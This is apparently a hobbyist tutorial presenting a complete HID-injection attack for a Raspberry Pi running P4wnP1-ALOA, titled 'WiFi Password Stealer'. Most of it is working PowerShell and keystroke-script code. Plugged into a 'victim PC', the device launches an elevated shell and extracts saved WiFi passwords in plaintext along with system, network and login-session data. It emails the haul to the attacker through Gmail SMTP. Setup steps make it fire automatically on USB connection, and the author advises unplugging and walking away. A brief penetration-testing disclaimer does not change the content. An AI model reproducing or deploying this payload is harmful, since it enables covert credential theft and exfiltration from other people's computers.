HID Script is a powerful scripting language that can be used with P4wnP1-ALOA very similar to the way Rubber Ducky works. I wrote a payload that could be optimized more I’m sure this is the first and only thing I have written in Power Shell and HID Script. Please do not use this script for evil purposes, this is meant to be a tool for legal penetration testing. I take no responsibility for any harm or trouble you cause. This script has been tested on multiple windows 10 machines, I started off trying a few different scripts I saw online but they all had issues and would fail on some Windows 10 installs. In this, I am not going to over setting up P4wnP1-ALOA I may write that up later.
We will be using Gmail and the internet connection of the PC we are connected to ex-filtrate the data we obtain. This script can be run in Power Shell but make sure to replace “YOUR EMAIL HERE” and “YOUR EMAIL PASSWORD” with your Gmail login information. The data we are grabbing:
- WiFi network names & plain text passwords
- Network information for all interfaces
- Computer information
- Operating system information
- Processor information
- BIOS information
- Login session information
- Hotfix information
The payload itself:
$o="AGH Computer Info v1.3`n`n PC Name: "+$Env:Computername+"`n`n";$a=0;$ws=(netsh wlan show profiles) -replace ".*:\s+";foreach($s in $ws){if($a -gt 1 -And $s -NotMatch " policy " -And $s -ne "User profiles" -And $s -NotMatch "-----" -And $s -NotMatch "<None>" -And $s.length -gt 5){$ssid=$s.Trim();if($s -Match ":"){$ssid=$s.Split(":")[1].Trim()}$pw=(netsh wlan show profiles name=$ssid key=clear);$pass="None";foreach($p in $pw){if($p -Match "Key Content"){$pass=$p.Split(":")[1].Trim();$o+="SSID: $ssid`nPassword: $pass`n`n"}}}$a++;}$o+="`n`n Network`n`n";$o+=(Get-NetIPConfiguration -All | Out-String);$o+="Computer System`n`n";$o+=(Get-WmiObject -Class Win32_ComputerSystem | Out-String);$o+="Operating System`n`n";$o+=(Get-WmiObject -Class Win32_OperatingSystem | Out-String);$o+="Processor Information`n`n";$o+=(Get-WmiObject -Class Win32_Processor | Out-String);$o+="BIOS Information`n`n";$o+=(Get-WmiObject -Class Win32_BIOS | Out-String);$o+= "Desktop Information`n`n";$o+=(Get-WmiObject -Class Win32_Desktop | Out-String);$o+="Logon Session`n`n";$o+=(Get-WmiObject -Class Win32_LogonSession | Out-String);$o+="Hotfixes`n`n";$o+=(Get-WmiObject -Class Win32_QuickFixEngineering | Out-String);$c=New-Object Net.Mail.SmtpClient("smtp.gmail.com",587);$c.EnableSsl=$true;$c.Credentials=New-Object System.Net.NetworkCredential("YOUR EMAIL HERE","YOUR EMAIL PASSWORD");$d=New-Object System.Net.Mail.MailMessage;$d.From="YOUR EMAIL HERE";$d.To.Add("YOUR EMAIL HERE");$d.Subject=($env:UserName+"@"+$env:UserDomain);$d.Body=$o;$c.Send($d);exit;So we have our Power Shell payload ready to go, we need to make it into an HID Scripts so we can run it with P4wnP1-ALOA.
layout('us');
delay(500);
press("GUI r");
delay(200);
type("powershell.exe");
press("CTRL SHIFT ENTER");
delay(3500);
press("LEFT");
delay(250);
press("ENTER");
delay(750)
press("ENTER");
delay(2500);
type('$o="AGH Computer Info v1.3`n`n PC Name: "+$Env:Computername+"`n`n";$a=0;$ws=(netsh wlan show profiles) -replace ".*:\s+";foreach($s in $ws){if($a -gt 1 -And $s -NotMatch " policy " -And $s -ne "User profiles" -And $s -NotMatch "-----" -And $s -NotMatch "<None>" -And $s.length -gt 5){$ssid=$s.Trim();if($s -Match ":"){$ssid=$s.Split(":")[1].Trim()}$pw=(netsh wlan show profiles name=$ssid key=clear);$pass="None";foreach($p in $pw){if($p -Match "Key Content"){$pass=$p.Split(":")[1].Trim();$o+="SSID: $ssid`nPassword: $pass`n`n"}}}$a++;}$o+="`n`n Network`n`n";$o+=(Get-NetIPConfiguration -All | Out-String);$o+="Computer System`n`n";$o+=(Get-WmiObject -Class Win32_ComputerSystem | Out-String);$o+="Operating System`n`n";$o+=(Get-WmiObject -Class Win32_OperatingSystem | Out-String);$o+="Processor Information`n`n";$o+=(Get-WmiObject -Class Win32_Processor | Out-String);$o+="BIOS Information`n`n";$o+=(Get-WmiObject -Class Win32_BIOS | Out-String);$o+= "Desktop Information`n`n";$o+=(Get-WmiObject -Class Win32_Desktop | Out-String);$o+="Logon Session`n`n";$o+=(Get-WmiObject -Class Win32_LogonSession | Out-String);$o+="Hotfixes`n`n";$o+=(Get-WmiObject -Class Win32_QuickFixEngineering | Out-String);$c=New-Object Net.Mail.SmtpClient("smtp.gmail.com",587);$c.EnableSsl=$true;$c.Credentials=New-Object System.Net.NetworkCredential("YOUR EMAIL HERE","YOUR EMAIL PASSWORD");$d=New-Object System.Net.Mail.MailMessage;$d.From="YOUR EMAIL HERE";$d.To.Add("YOUR EMAIL HERE");$d.Subject=($env:UserName+"@"+$env:UserDomain);$d.Body=$o;$c.Send($d);exit;');
press("ENTER");HID Script WiFi Password Stealer
I had access to 3 computers I tested this on several times with a max execution time of 63 seconds and an average execution time of 59 seconds. That is the time starting when I plugged in my Raspberry Pi 0 W into the victim PC to the time the Power Shell script exited. If you have your email setup and open on your phone as soon as you hear the notification you can unplug your Pi and walk away. If you want to make this script execute as soon as the Pi is booted you need to set a Trigger action via the P4wnP1-ALOA web interface.
Step 1 Make a new HID Script
Add the code from above into the HID Script then click store and save it as “AGHComputerInfo”.
Step 2 Create a new trigger action
Press the Add One button under the trigger action tab.
Check enabled.
Set the trigger as “USB gadget connected to host”.
Set the action as “start a HIDScript”.
Set script name as “AGHComputerInfo.js”.
Click the Update button.
Make sure to click store and save the template as “startup” unless you have changed the default.
Step 3 Test it out
Reboot the Pi and watch it go to work.